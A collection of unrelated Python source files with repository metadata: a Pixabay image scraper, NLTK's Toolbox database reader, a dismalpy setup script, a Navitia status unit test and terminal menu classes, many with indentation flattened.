# default parameters for https://pixabay.com/de/photos
params = {
"min_height": None,
"orientation": None,
"image_type": None,
"cat": None,
"q": None,
"min_width": None,
"order": "ec",
"colors": None,
"pagi": None
}
def get_imgs(params=params, url="https://pixabay.com/de/photos"):
    # get page's content (requests drops parameters whose value is None)
    page = requests.get(url, params=params).text
    # find all img tags on the page
    soup = BeautifulSoup(page, "html.parser")
    imgs = soup.find_all("img")
return imgs
# not necessary but nice to have
def download_galerie(params=params, url="https://pixabay.com/de/photos"):
imgs = get_imgs(params, url) #get all images
# loop through images
i = 0 # image count
for img in imgs:
# get url the images are hosted on
src = img.get("src")
if (src == "/static/img/blank.gif"):
src = img.get("data-lazy")
# download and save with image count
with open("pics/" + str(i) + ".jpg", "wb") as f:
f.write(requests.get(src).content)
i += 1 # count
def get_img(saveTo=False, params=params, url="https://pixabay.com/de/photos"):
imgs = get_imgs(params, url)
# choose random image from imgs
img = choice(imgs)
# get the url of the img
src = img.get("src")
if src == "/static/img/blank.gif": src = img.get("data-lazy")
    # get the img itself
img = requests.get(src).content
img = BytesIO(img)
# save the img if path is given
if (saveTo):
with open(saveTo, "wb") as f:
f.write(img.getvalue())
print(img)
return img
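
# Illustrative use (editorial; the filename is made up):
#   img = get_img(saveTo="random.jpg")   # also writes the file to disk
#   data = img.getvalue()                # raw image bytes, reusable in memory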
|
Richie-8DK/randomTaquin
|
grab.py
|
Python
|
gpl-3.0
| 1,724
|
# Natural Language Toolkit: Toolbox Reader
#
# Copyright (C) 2001-2012 NLTK Project
# Author: Greg Aumann <greg_aumann@sil.org>
# URL: <http://nltk.org>
# For license information, see LICENSE.TXT
"""
Module for reading, writing and manipulating
Toolbox databases and settings files.
"""
from __future__ import print_function
import os, re, codecs
from StringIO import StringIO
from xml.etree.ElementTree import ElementTree, TreeBuilder, Element, SubElement
from nltk.data import PathPointer, ZipFilePathPointer, find
class StandardFormat(object):
"""
Class for reading and processing standard format marker files and strings.
"""
def __init__(self, filename=None, encoding=None):
self._encoding = encoding
if filename is not None:
self.open(filename)
def open(self, sfm_file):
"""
Open a standard format marker file for sequential reading.
:param sfm_file: name of the standard format marker input file
:type sfm_file: str
"""
if isinstance(sfm_file, PathPointer):
# [xx] We don't use 'rU' mode here -- do we need to?
# (PathPointer.open doesn't take a mode option)
self._file = sfm_file.open(self._encoding)
else:
self._file = codecs.open(sfm_file, 'rU', self._encoding)
def open_string(self, s):
"""
Open a standard format marker string for sequential reading.
:param s: string to parse as a standard format marker input file
:type s: str
"""
self._file = StringIO(s)
def raw_fields(self):
"""
Return an iterator that returns the next field in a (marker, value)
tuple. Linebreaks and trailing white space are preserved except
for the final newline in each field.
:rtype: iter(tuple(str, str))
"""
join_string = '\n'
line_regexp = r'^%s(?:\\(\S+)\s*)?(.*)$'
# discard a BOM in the first line
first_line_pat = re.compile(line_regexp % u'(?:\ufeff)?'.encode('utf8'))
line_pat = re.compile(line_regexp % '')
# need to get first line outside the loop for correct handling
# of the first marker if it spans multiple lines
file_iter = iter(self._file)
line = file_iter.next()
mobj = re.match(first_line_pat, line)
mkr, line_value = mobj.groups()
value_lines = [line_value,]
self.line_num = 0
for line in file_iter:
self.line_num += 1
mobj = re.match(line_pat, line)
line_mkr, line_value = mobj.groups()
if line_mkr:
yield (mkr, join_string.join(value_lines))
mkr = line_mkr
value_lines = [line_value,]
else:
value_lines.append(line_value)
self.line_num += 1
yield (mkr, join_string.join(value_lines))
def fields(self, strip=True, unwrap=True, encoding=None, errors='strict', unicode_fields=None):
"""
Return an iterator that returns the next field in a ``(marker, value)``
tuple, where ``marker`` and ``value`` are unicode strings if an ``encoding``
was specified in the ``fields()`` method. Otherwise they are non-unicode strings.
:param strip: strip trailing whitespace from the last line of each field
:type strip: bool
:param unwrap: Convert newlines in a field to spaces.
:type unwrap: bool
:param encoding: Name of an encoding to use. If it is specified then
the ``fields()`` method returns unicode strings rather than non
unicode strings.
:type encoding: str or None
:param errors: Error handling scheme for codec. Same as the ``decode()``
builtin string method.
:type errors: str
:param unicode_fields: Set of marker names whose values are UTF-8 encoded.
Ignored if encoding is None. If the whole file is UTF-8 encoded set
``encoding='utf8'`` and leave ``unicode_fields`` with its default
value of None.
:type unicode_fields: sequence
:rtype: iter(tuple(str, str))
"""
if encoding is None and unicode_fields is not None:
raise ValueError('unicode_fields is set but not encoding.')
unwrap_pat = re.compile(r'\n+')
for mkr, val in self.raw_fields():
if encoding:
if unicode_fields is not None and mkr in unicode_fields:
val = val.decode('utf8', errors)
else:
val = val.decode(encoding, errors)
mkr = mkr.decode(encoding, errors)
if unwrap:
val = unwrap_pat.sub(' ', val)
if strip:
val = val.rstrip()
yield (mkr, val)
def close(self):
"""Close a previously opened standard format marker file or string."""
self._file.close()
try:
del self.line_num
except AttributeError:
pass
class ToolboxData(StandardFormat):
def parse(self, grammar=None, **kwargs):
if grammar:
return self._chunk_parse(grammar=grammar, **kwargs)
else:
return self._record_parse(**kwargs)
def _record_parse(self, key=None, **kwargs):
"""
Returns an element tree structure corresponding to a toolbox data file with
all markers at the same level.
Thus the following Toolbox database::
\_sh v3.0 400 Rotokas Dictionary
\_DateStampHasFourDigitYear
\lx kaa
\ps V.A
\ge gag
\gp nek i pas
\lx kaa
\ps V.B
\ge strangle
\gp pasim nek
after parsing will end up with the same structure (ignoring the extra
whitespace) as the following XML fragment after being parsed by
ElementTree::
<toolbox_data>
<header>
<_sh>v3.0 400 Rotokas Dictionary</_sh>
<_DateStampHasFourDigitYear/>
</header>
<record>
<lx>kaa</lx>
<ps>V.A</ps>
<ge>gag</ge>
<gp>nek i pas</gp>
</record>
<record>
<lx>kaa</lx>
<ps>V.B</ps>
<ge>strangle</ge>
<gp>pasim nek</gp>
</record>
</toolbox_data>
:param key: Name of key marker at the start of each record. If set to
None (the default value) the first marker that doesn't begin with
an underscore is assumed to be the key.
:type key: str
:param kwargs: Keyword arguments passed to ``StandardFormat.fields()``
:type kwargs: dict
:rtype: ElementTree._ElementInterface
:return: contents of toolbox data divided into header and records
"""
builder = TreeBuilder()
builder.start('toolbox_data', {})
builder.start('header', {})
in_records = False
for mkr, value in self.fields(**kwargs):
if key is None and not in_records and mkr[0] != '_':
key = mkr
if mkr == key:
if in_records:
builder.end('record')
else:
builder.end('header')
in_records = True
builder.start('record', {})
builder.start(mkr, {})
builder.data(value)
builder.end(mkr)
if in_records:
builder.end('record')
else:
builder.end('header')
builder.end('toolbox_data')
return builder.close()
def _tree2etree(self, parent):
from nltk.tree import Tree
root = Element(parent.node)
for child in parent:
if isinstance(child, Tree):
root.append(self._tree2etree(child))
else:
text, tag = child
e = SubElement(root, tag)
e.text = text
return root
def _chunk_parse(self, grammar=None, top_node='record', trace=0, **kwargs):
"""
Returns an element tree structure corresponding to a toolbox data file
parsed according to the chunk grammar.
:type grammar: str
:param grammar: Contains the chunking rules used to parse the
database. See ``chunk.RegExp`` for documentation.
:type top_node: str
:param top_node: The node value that should be used for the
top node of the chunk structure.
:type trace: int
:param trace: The level of tracing that should be used when
parsing a text. ``0`` will generate no tracing output;
``1`` will generate normal tracing output; and ``2`` or
higher will generate verbose tracing output.
:type kwargs: dict
:param kwargs: Keyword arguments passed to ``toolbox.StandardFormat.fields()``
:rtype: ElementTree._ElementInterface
"""
from nltk import chunk
from nltk.tree import Tree
cp = chunk.RegexpParser(grammar, top_node=top_node, trace=trace)
db = self.parse(**kwargs)
tb_etree = Element('toolbox_data')
header = db.find('header')
tb_etree.append(header)
for record in db.findall('record'):
parsed = cp.parse([(elem.text, elem.tag) for elem in record])
tb_etree.append(self._tree2etree(parsed))
return tb_etree
_is_value = re.compile(r"\S")
def to_sfm_string(tree, encoding=None, errors='strict', unicode_fields=None):
"""
Return a string with a standard format representation of the toolbox
data in tree (tree can be a toolbox database or a single record).
:param tree: flat representation of toolbox data (whole database or single record)
:type tree: ElementTree._ElementInterface
:param encoding: Name of an encoding to use.
:type encoding: str
:param errors: Error handling scheme for codec. Same as the ``encode()``
builtin string method.
:type errors: str
:param unicode_fields:
:type unicode_fields: dict(str) or set(str)
:rtype: str
"""
if tree.tag == 'record':
root = Element('toolbox_data')
root.append(tree)
tree = root
if tree.tag != 'toolbox_data':
raise ValueError("not a toolbox_data element structure")
if encoding is None and unicode_fields is not None:
raise ValueError("if encoding is not specified then neither should unicode_fields")
l = []
for rec in tree:
l.append('\n')
for field in rec:
mkr = field.tag
value = field.text
if encoding is not None:
if unicode_fields is not None and mkr in unicode_fields:
cur_encoding = 'utf8'
else:
cur_encoding = encoding
if re.search(_is_value, value):
l.append((u"\\%s %s\n" % (mkr, value)).encode(cur_encoding, errors))
else:
l.append((u"\\%s%s\n" % (mkr, value)).encode(cur_encoding, errors))
else:
if re.search(_is_value, value):
l.append("\\%s %s\n" % (mkr, value))
else:
l.append("\\%s%s\n" % (mkr, value))
return ''.join(l[1:])
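# Editorial example (illustrative): a tree holding
#   <record><lx>kaa</lx><ps>V.A</ps></record>
# serializes back to the standard format text
#   \lx kaa
#   \ps V.A
# with a blank line inserted between successive records.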
class ToolboxSettings(StandardFormat):
"""This class is the base class for settings files."""
def __init__(self):
super(ToolboxSettings, self).__init__()
def parse(self, encoding=None, errors='strict', **kwargs):
"""
Return the contents of toolbox settings file with a nested structure.
:param encoding: encoding used by settings file
:type encoding: str
:param errors: Error handling scheme for codec. Same as ``decode()`` builtin method.
:type errors: str
:param kwargs: Keyword arguments passed to ``StandardFormat.fields()``
:type kwargs: dict
:rtype: ElementTree._ElementInterface
"""
builder = TreeBuilder()
for mkr, value in self.fields(encoding=encoding, errors=errors, **kwargs):
            # Check whether the first char of the field marker
            # indicates a block start (+) or end (-)
            block = mkr[0]
            if block in ("+", "-"):
                mkr = mkr[1:]
            else:
                block = None
# Build tree on the basis of block char
if block == "+":
builder.start(mkr, {})
builder.data(value)
elif block == '-':
builder.end(mkr)
else:
builder.start(mkr, {})
builder.data(value)
builder.end(mkr)
return builder.close()
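
# Editorial example (illustrative settings fragment): the field sequence
#   \+expset
#   \ver 5.0
#   \-expset
# parses into <expset><ver>5.0</ver></expset>, since "+" opens a block,
# "-" closes it, and unmarked fields become leaf elements.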
def to_settings_string(tree, encoding=None, errors='strict', unicode_fields=None):
# write XML to file
l = list()
_to_settings_string(tree.getroot(), l, encoding=encoding, errors=errors, unicode_fields=unicode_fields)
return ''.join(l)
def _to_settings_string(node, l, **kwargs):
# write XML to file
tag = node.tag
text = node.text
if len(node) == 0:
if text:
l.append('\\%s %s\n' % (tag, text))
else:
l.append('\\%s\n' % tag)
else:
if text:
l.append('\\+%s %s\n' % (tag, text))
else:
l.append('\\+%s\n' % tag)
for n in node:
_to_settings_string(n, l, **kwargs)
l.append('\\-%s\n' % tag)
return
def remove_blanks(elem):
"""
Remove all elements and subelements with no text and no child elements.
:param elem: toolbox data in an elementtree structure
:type elem: ElementTree._ElementInterface
"""
out = list()
for child in elem:
remove_blanks(child)
if child.text or len(child) > 0:
out.append(child)
elem[:] = out
def add_default_fields(elem, default_fields):
"""
Add blank elements and subelements specified in default_fields.
:param elem: toolbox data in an elementtree structure
:type elem: ElementTree._ElementInterface
:param default_fields: fields to add to each type of element and subelement
:type default_fields: dict(tuple)
"""
for field in default_fields.get(elem.tag, []):
if elem.find(field) is None:
SubElement(elem, field)
for child in elem:
add_default_fields(child, default_fields)
def sort_fields(elem, field_orders):
"""
Sort the elements and subelements in order specified in field_orders.
:param elem: toolbox data in an elementtree structure
:type elem: ElementTree._ElementInterface
:param field_orders: order of fields for each type of element and subelement
:type field_orders: dict(tuple)
"""
order_dicts = dict()
for field, order in field_orders.items():
order_dicts[field] = order_key = dict()
for i, subfield in enumerate(order):
order_key[subfield] = i
_sort_fields(elem, order_dicts)
def _sort_fields(elem, orders_dicts):
"""sort the children of elem"""
try:
order = orders_dicts[elem.tag]
except KeyError:
pass
else:
tmp = [((order.get(child.tag, 1e9), i), child) for i, child in enumerate(elem)]
tmp.sort()
elem[:] = [child for key, child in tmp]
for child in elem:
if len(child):
_sort_fields(child, orders_dicts)
def add_blank_lines(tree, blanks_before, blanks_between):
"""
    Add blank lines before all elements and subelements specified in blanks_before.
    :param tree: toolbox data in an elementtree structure
    :type tree: ElementTree._ElementInterface
    :param blanks_before: elements and subelements to add blank lines before
    :type blanks_before: dict(tuple)
    :param blanks_between: elements and subelements to add blank lines between
    :type blanks_between: dict(tuple)
"""
try:
before = blanks_before[tree.tag]
between = blanks_between[tree.tag]
except KeyError:
for elem in tree:
if len(elem):
add_blank_lines(elem, blanks_before, blanks_between)
else:
last_elem = None
for elem in tree:
tag = elem.tag
if last_elem is not None and last_elem.tag != tag:
if tag in before and last_elem is not None:
e = last_elem.getiterator()[-1]
e.text = (e.text or "") + "\n"
else:
if tag in between:
e = last_elem.getiterator()[-1]
e.text = (e.text or "") + "\n"
if len(elem):
add_blank_lines(elem, blanks_before, blanks_between)
last_elem = elem
def demo():
from itertools import islice
# zip_path = find('corpora/toolbox.zip')
# lexicon = ToolboxData(ZipFilePathPointer(zip_path, 'toolbox/rotokas.dic')).parse()
file_path = find('corpora/toolbox/rotokas.dic')
lexicon = ToolboxData(file_path).parse()
print('first field in fourth record:')
print(lexicon[3][0].tag)
print(lexicon[3][0].text)
print('\nfields in sequential order:')
for field in islice(lexicon.find('record'), 10):
print(field.tag, field.text)
print('\nlx fields:')
for field in islice(lexicon.findall('record/lx'), 10):
print(field.text)
settings = ToolboxSettings()
file_path = find('corpora/toolbox/MDF/MDF_AltH.typ')
settings.open(file_path)
# settings.open(ZipFilePathPointer(zip_path, entry='toolbox/MDF/MDF_AltH.typ'))
tree = settings.parse(unwrap=False, encoding='cp1252')
print(tree.find('expset/expMDF/rtfPageSetup/paperSize').text)
settings_tree = ElementTree(tree)
print(to_settings_string(settings_tree).encode('utf8'))
if __name__ == '__main__':
demo()
|
abad623/verbalucce
|
verbalucce/nltk/toolbox.py
|
Python
|
apache-2.0
| 17,965
|
#!/usr/bin/env python
"""DismalPy: a collection of resources for quantitative economics in Python.
"""
DOCLINES = __doc__.split("\n")
import os
import sys
import subprocess
if sys.version_info[:2] < (2, 6) or (3, 0) <= sys.version_info[0:2] < (3, 2):
raise RuntimeError("Python version 2.6, 2.7 or >= 3.2 required.")
if sys.version_info[0] < 3:
import __builtin__ as builtins
else:
import builtins
CLASSIFIERS = """\
Development Status :: 4 - Beta
Intended Audience :: Science/Research
License :: OSI Approved :: BSD License
Programming Language :: Cython
Programming Language :: Python
Programming Language :: Python :: 3
Topic :: Scientific/Engineering
Operating System :: Microsoft :: Windows
Operating System :: POSIX
Operating System :: Unix
Operating System :: MacOS
"""
MAJOR = 0
MINOR = 2
MICRO = 3
ISRELEASED = True
VERSION = '%d.%d.%d' % (MAJOR, MINOR, MICRO)
# Return the git revision as a string
def git_version():
def _minimal_ext_cmd(cmd):
# construct minimal environment
env = {}
for k in ['SYSTEMROOT', 'PATH']:
v = os.environ.get(k)
if v is not None:
env[k] = v
# LANGUAGE is used on win32
env['LANGUAGE'] = 'C'
env['LANG'] = 'C'
env['LC_ALL'] = 'C'
out = subprocess.Popen(cmd, stdout = subprocess.PIPE, env=env).communicate()[0]
return out
try:
out = _minimal_ext_cmd(['git', 'rev-parse', 'HEAD'])
GIT_REVISION = out.strip().decode('ascii')
except OSError:
GIT_REVISION = "Unknown"
return GIT_REVISION
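
# Editorial example: inside a git checkout git_version() returns the
# full revision hash, e.g. "0123abc..." (illustrative value); outside
# one, or when git is unavailable, it falls back to "Unknown".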
# BEFORE importing distutils, remove MANIFEST. distutils doesn't properly
# update it when the contents of directories change.
if os.path.exists('MANIFEST'):
os.remove('MANIFEST')
def get_version_info():
# Adding the git rev number needs to be done inside
# write_version_py(), otherwise the import of dismalpy.version messes
# up the build under Python 3.
FULLVERSION = VERSION
if os.path.exists('.git'):
GIT_REVISION = git_version()
elif os.path.exists('dismalpy/version.py'):
# must be a source distribution, use existing version file
# load it as a separate module to not load dismalpy/__init__.py
import imp
version = imp.load_source('dismalpy.version', 'dismalpy/version.py')
GIT_REVISION = version.git_revision
else:
GIT_REVISION = "Unknown"
if not ISRELEASED:
FULLVERSION += '.dev-' + GIT_REVISION[:7]
return FULLVERSION, GIT_REVISION
def write_version_py(filename='dismalpy/version.py'):
cnt = """
# THIS FILE IS GENERATED FROM dismalpy SETUP.PY
short_version = '%(version)s'
version = '%(version)s'
full_version = '%(full_version)s'
git_revision = '%(git_revision)s'
release = %(isrelease)s
if not release:
version = full_version
"""
FULLVERSION, GIT_REVISION = get_version_info()
a = open(filename, 'w')
try:
a.write(cnt % {'version': VERSION,
'full_version' : FULLVERSION,
'git_revision' : GIT_REVISION,
'isrelease': str(ISRELEASED)})
finally:
a.close()
try:
from sphinx.setup_command import BuildDoc
HAVE_SPHINX = True
except:
HAVE_SPHINX = False
if HAVE_SPHINX:
class DismalpyBuildDoc(BuildDoc):
"""Run in-place build before Sphinx doc build"""
def run(self):
# Make sure dismalpy is built for autodoc features
ret = subprocess.call([sys.executable, sys.argv[0], 'build_ext', '-i'])
if ret != 0:
raise RuntimeError("Building Dismalpy failed!")
# Regenerate notebooks
cwd = os.path.abspath(os.path.dirname(__file__))
print("Re-generating notebooks")
p = subprocess.call([sys.executable,
os.path.join(cwd, 'tools', 'sphinxify_notebooks.py'),
], cwd=cwd)
if p != 0:
raise RuntimeError("Notebook generation failed!")
# Build the documentation
BuildDoc.run(self)
def generate_cython():
cwd = os.path.abspath(os.path.dirname(__file__))
print("Cythonizing sources")
p = subprocess.call([sys.executable,
os.path.join(cwd, 'tools', 'cythonize.py'),
'dismalpy'],
cwd=cwd)
if p != 0:
raise RuntimeError("Running cythonize failed!")
def configuration(parent_package='',top_path=None):
from numpy.distutils.misc_util import Configuration
config = Configuration(None, parent_package, top_path)
config.set_options(ignore_setup_xxx_py=True,
assume_default_configuration=True,
delegate_options_to_subpackages=True,
quiet=True)
config.add_subpackage('dismalpy')
config.add_data_files(('dismalpy','*.txt'))
config.get_version('dismalpy/version.py')
return config
def setup_package():
# Rewrite the version file every time
write_version_py()
if HAVE_SPHINX:
cmdclass = {'build_sphinx': DismalpyBuildDoc}
else:
cmdclass = {}
# Figure out whether to add ``*_requires = ['numpy']``.
# We don't want to do that unconditionally, because we risk updating
# an installed numpy which fails too often. Just if it's not installed, we
# may give it a try. See gh-3379.
build_requires = ['statsmodels>=0.8', 'scipy>=0.14', 'Cython>=0.20','pandas>=0.16.0']
try:
import numpy
except:
build_requires = ['numpy>=1.5.1']
metadata = dict(
name = 'dismalpy',
maintainer = "Chad Fulton",
maintainer_email = "ChadFulton+pypi@gmail.com",
description = DOCLINES[0],
long_description = "\n".join(DOCLINES[2:]),
url = "http://github.com/dismalpy/dismalpy",
# download_url = "",
license = 'Simplified-BSD',
cmdclass=cmdclass,
classifiers=[_f for _f in CLASSIFIERS.split('\n') if _f],
platforms = ["Windows", "Linux", "Solaris", "Mac OS-X", "Unix"],
test_suite='nose.collector',
setup_requires = build_requires,
install_requires = build_requires,
)
if len(sys.argv) >= 2 and ('--help' in sys.argv[1:] or
sys.argv[1] in ('--help-commands', 'egg_info', '--version',
'clean')):
# For these actions, NumPy is not required.
#
# They are required to succeed without Numpy for example when
# pip is used to install dismalpy when Numpy is not yet present in
# the system.
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
FULLVERSION, GIT_REVISION = get_version_info()
metadata['version'] = FULLVERSION
else:
# if len(sys.argv) >= 2 and sys.argv[1] == 'bdist_wheel':
# # bdist_wheel needs setuptools
# import setuptools
import setuptools
from numpy.distutils.core import setup
cwd = os.path.abspath(os.path.dirname(__file__))
if not os.path.exists(os.path.join(cwd, 'PKG-INFO')):
# Generate Cython sources, unless building from source release
generate_cython()
metadata['configuration'] = configuration
setup(**metadata)
if __name__ == '__main__':
setup_package()
|
dismalpy/dismalpy
|
setup.py
|
Python
|
bsd-2-clause
| 7,553
|
# -*- coding: utf-8 -*-
# Copyright 2014 Davide Corio
# Copyright 2015-2016 Lorenzo Battistini - Agile Business Group
# License LGPL-3.0 or later (http://www.gnu.org/licenses/lgpl).
from . import wizard
from . import models
|
linkitspa/l10n-italy
|
l10n_it_fatturapa_out/__init__.py
|
Python
|
agpl-3.0
| 225
|
# Copyright (c) 2001-2014, Canal TP and/or its affiliates. All rights reserved.
#
# This file is part of Navitia,
# the software to build cool stuff with public transport.
#
# Hope you'll enjoy and contribute to this project,
# powered by Canal TP (www.canaltp.fr).
# Help us simplify mobility and open public transport:
# a non ending quest to the responsive locomotion way of traveling!
#
# LICENCE: This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Stay tuned using
# twitter @navitia
# channel `#navitia` on riot https://riot.im/app/#/room/#navitia:matrix.org
# https://groups.google.com/d/forum/navitia
# www.navitia.io
from jormungandr.instance import Instance
from jormungandr.interfaces.v1 import add_common_status
from jormungandr.street_network.kraken import Kraken
from jormungandr.equipments import EquipmentProviderManager
from collections import OrderedDict
krakenBss = Kraken(instance=None, service_url=None, id="krakenBss", modes=["bss"])
krakenAll = Kraken(instance=None, service_url=None, id="krakenAll", modes=["walking", "bike", "car"])
expected_streetnetworks_status = [
{'modes': ['walking', 'bike', 'car'], 'id': 'krakenAll', 'class': 'Kraken'},
{'modes': ['bss'], 'id': 'krakenBss', 'class': 'Kraken'},
]
instant_system_ridesharing_config = [
{
"args": {
"rating_scale_min": 0,
"crowfly_radius": 500,
"network": "Network 1",
"feed_publisher": {
"url": "https://url_for_publisher",
"id": "publisher id",
"license": "Private",
"name": "Feed publisher name",
},
"service_url": "https://service_url",
"api_key": "private_key",
"rating_scale_max": 5,
},
"class": "jormungandr.scenarios.ridesharing.instant_system.InstantSystem",
}
]
expected_ridesharing_status = [
{
"circuit_breaker": {"current_state": "closed", "fail_counter": 0, "reset_timeout": 60},
"class": "InstantSystem",
"crowfly_radius": 500,
"id": "Instant System",
"network": "Network 1",
"rating_scale_max": 5,
"rating_scale_min": 0,
}
]
sytral_equipment_details_config = [
{
"class": "jormungandr.equipments.sytral.SytralProvider",
"key": "sytral",
"args": {
"url": "https://url_for_equipment_details",
"fail_max": 5,
"codes_types": ["TCL_ESCALIER", "TCL_ASCENSEUR"],
"timeout": 1,
},
}
]
expected_equipment_providers_keys = ['sytral']
expected_equipment_providers = [
{"codes_types": ["TCL_ESCALIER", "TCL_ASCENSEUR"], "fail_max": 5, "key": "sytral", "timeout": 1}
]
# The only purpose of this class is to override get_all_street_networks()
# To bypass the app.config[str('DISABLE_DATABASE')] and the get_models()
# Of the real implementation
class FakeInstance(Instance):
def __init__(
self,
disable_database,
ridesharing_configurations=None,
equipment_details_config=None,
instance_equipment_providers=None,
):
super(FakeInstance, self).__init__(
context=None,
name="instance",
zmq_socket=None,
street_network_configurations=[],
ridesharing_configurations=ridesharing_configurations,
instance_equipment_providers=[],
realtime_proxies_configuration=[],
zmq_socket_type=None,
autocomplete_type='kraken',
streetnetwork_backend_manager=None,
)
self.disable_database = disable_database
self.equipment_provider_manager = EquipmentProviderManager(equipment_details_config)
self.equipment_provider_manager.init_providers(instance_equipment_providers)
def get_models(self):
return None
def get_all_street_networks(self):
return (
self.get_all_street_networks_json() if self.disable_database else self.get_all_street_networks_db()
)
# returns a list
def get_all_street_networks_json(self):
return [krakenBss, krakenAll]
# returns a dict
def get_all_street_networks_db(self):
return {krakenBss: ["bss"], krakenAll: ["walking", "bike", "car"]}
def add_common_status_test():
# get_all_street_networks_json is called
response1 = call_add_common_status(True)
# get_all_street_networks_db is called
response2 = call_add_common_status(False)
# That's the real purpose of the test
# The responses must be the same whether we call
# get_all_street_networks_json or get_all_street_networks_db
assert response1 == response2
def call_add_common_status(disable_database):
instance = FakeInstance(
disable_database,
ridesharing_configurations=instant_system_ridesharing_config,
equipment_details_config=sytral_equipment_details_config,
instance_equipment_providers=["sytral"],
)
response = {}
response['status'] = {}
add_common_status(response, instance)
assert response['status']["is_open_data"] == False
assert response['status']["is_open_service"] == False
assert response['status']['realtime_proxies'] == []
# We sort this list because the order is not important
# And it is easier to compare
streetnetworks_status = response['status']["street_networks"]
streetnetworks_status.sort()
assert streetnetworks_status == expected_streetnetworks_status
ridesharing_status = response['status']["ridesharing_services"]
ridesharing_status.sort()
assert ridesharing_status == expected_ridesharing_status
equipment_providers_keys = response['status']["equipment_providers_services"]['equipment_providers_keys']
assert equipment_providers_keys == expected_equipment_providers_keys
equipment_providers = response['status']["equipment_providers_services"]['equipment_providers']
equipment_providers.sort()
assert equipment_providers == expected_equipment_providers
assert response['status']['autocomplete'] == {'class': 'Kraken'}
    # Wrap the response in an OrderedDict so the two calls being
    # compared expose their fields in a stable order
return OrderedDict(response)
|
kinnou02/navitia
|
source/jormungandr/jormungandr/interfaces/v1/test/add_common_status_tests.py
|
Python
|
agpl-3.0
| 6,843
|
# no-check-code
|
mikel-egana-aranguren/SADI-Galaxy-Docker
|
galaxy-dist/eggs/mercurial-2.2.3-py2.7-linux-x86_64-ucs4.egg/mercurial/httpclient/tests/__init__.py
|
Python
|
gpl-3.0
| 16
|
'''
menu classes
'''
import subprocess, os
from . import userInput
class BaseMenu(object):
linePad = 50
def __init__(self, db, title, description):
self.db = db
self.title = title
self.description = description
def borderString(self):
columns, rows = userInput.getTerminalSize()
return ''.center(columns,'#')
    def underLine(self, inStr=None, minLength=12):
        if inStr is None or len(inStr) < minLength:
            return '='*minLength
        return len(inStr) * '='
def makeTitle(self, title, description):
titleString = []
columns, rows = userInput.getTerminalSize()
titleString.append(self.borderString())
titleString.append('\n')
titleString.append(title.center(columns))
titleString.append('\n')
titleString.append('%s'%(self.underLine(inStr=title).center(columns)))
titleString.append('\n')
if not self.description in [None, ""]:
titleString.append((' %s:'%(description)).center(columns))
titleString.append('\n')
return titleString
def makeScreen(self):
screen = self.makeTitle(self.title, self.description)
screen.extend(self.makeScreenLines())
screen.append(self.borderString() + '\n')
return ''.join(screen)
class Menu(BaseMenu):
'''
Menu is the base class for all numberical selection menus
'''
def __init__(self, db, title, description, cursor):
BaseMenu.__init__(self, db, title, description)
self.cursor = cursor
self.MenuOptions = []
self.addOption(MenuOption(db = db, title = "Exit Menu", description="Exit Menu", commit = True, clear=False, action = self.exitMenu))
def exitMenu(self):
raise KeyboardInterrupt
def runMenu(self):
outVal = None
userInput.printToScreen(self.makeScreen())
while True:
varIn = userInput.inputUniversal(self.cursor).upper().strip()
            if(varIn.isdigit() and 0 < int(varIn) <= len(self.MenuOptions)):
try:
if(self.MenuOptions[int(varIn) -1].clear):
userInput.printToScreen(self.makeScreen())
outVal = self.MenuOptions[int(varIn) -1].run()
if(self.MenuOptions[int(varIn) -1].commit):
self.db.commit()
break
except KeyboardInterrupt:
break
except UserWarning as uw:
print(uw)
continue
return outVal
def addOption(self, option):
self.MenuOptions.append(option)
return option
def numberedLine(self, text, count):
columns, rows = userInput.getTerminalSize()
return ("\t\t%d) %s"%(count, text)).ljust(self.linePad, ' ').center(columns).title()
def makeScreenLines(self):
return ("%s"%(self.numberedLine(self.MenuOptions[i].title, i + 1)) + '\n' for i in range(len(self.MenuOptions)))
class MenuOption(object):
def __init__(self, db = None, title = None, description = None, commit = False, clear = True, action=None):
self.db = db
self.title = title
self.description = description
self.commit = commit
self.clear = clear
self.action = action
self.typeCheck()
def typeCheck(self):
if(not type(self.commit) == bool):
raise UserWarning('commit must be a boolean')
if(not type(self.clear) == bool):
raise UserWarning('clear must be a boolean')
def run(self):
if self.action != None:
return self.action()
class ListMenu(BaseMenu):
'''
make a command controlled menu with a list
'''
def __init__(self, db, title, description, cursor, closeOnPrint = True, fields = 3, fieldLengths = [.3,.3,.4]):
BaseMenu.__init__(self, db, title, description)
self.cursor = cursor
self.commands = {
'exit':userInput.Command(func=self.exitMenu, takesArgs=False, descrip = 'Exit Inventory'),
'commands':userInput.Command(func=self.printCommands, takesArgs=False, descrip = 'Print the available commands', hide = True),
'help':userInput.Command(func=self.printCommands, takesArgs=False, descrip = 'No one can save you now', hide = True)
}
self.listItems = []
self.fields = fields
self.fieldLengths = fieldLengths
def printCommands(self):
userInput.printToScreen("Some of the Avaliable Commands:")
maxLen = max([len(command) for command in self.commands if not self.commands[command].hide])
for command in self.commands:
if not self.commands[command].hide:
userInput.printToScreen('{0}{1} -> {2.descrip}'.format(' '*(maxLen - len(command)), command, self.commands[command]))
def exitMenu(self):
raise KeyboardInterrupt
def runMenu(self):
userInput.printToScreen(self.makeScreen())
while True:
varIn = userInput.inputUniversal(self.cursor).lower().strip()
try:
arrayIn = varIn.split(' ')
command = self.commands[arrayIn[0]]
if command.takesArgs == True:
command.func(arrayIn[1:])
else:
command.func()
except KeyboardInterrupt:
break
except UserWarning as uw:
print(uw)
continue
except IndexError:
continue
except KeyError:
continue
def addListItem(self, itemArray):
if(len(itemArray) > self.fields):
raise UserWarning('item array is longer than the number of fields of this menu ({0} vs {1})'.format(len(itemArray), self.fields))
else:
self.listItems.append(itemArray)
return itemArray
def listLine(self, listItem):
formattedFields = []
columns, rows = userInput.getTerminalSize()
for field, relFieldLen in zip(listItem, self.fieldLengths):
field = str(field)
            fieldLen = int(relFieldLen * columns)
            if len(field) > fieldLen:
                formattedFields.append(field[:fieldLen - 3] + '...')
            else:
                formattedFields.append(field + ' ' * (fieldLen - len(field)))
return " | ".join(formattedFields)
def makeScreenLines(self):
return (self.listLine(listItem) + '\n' for listItem in self.listItems)
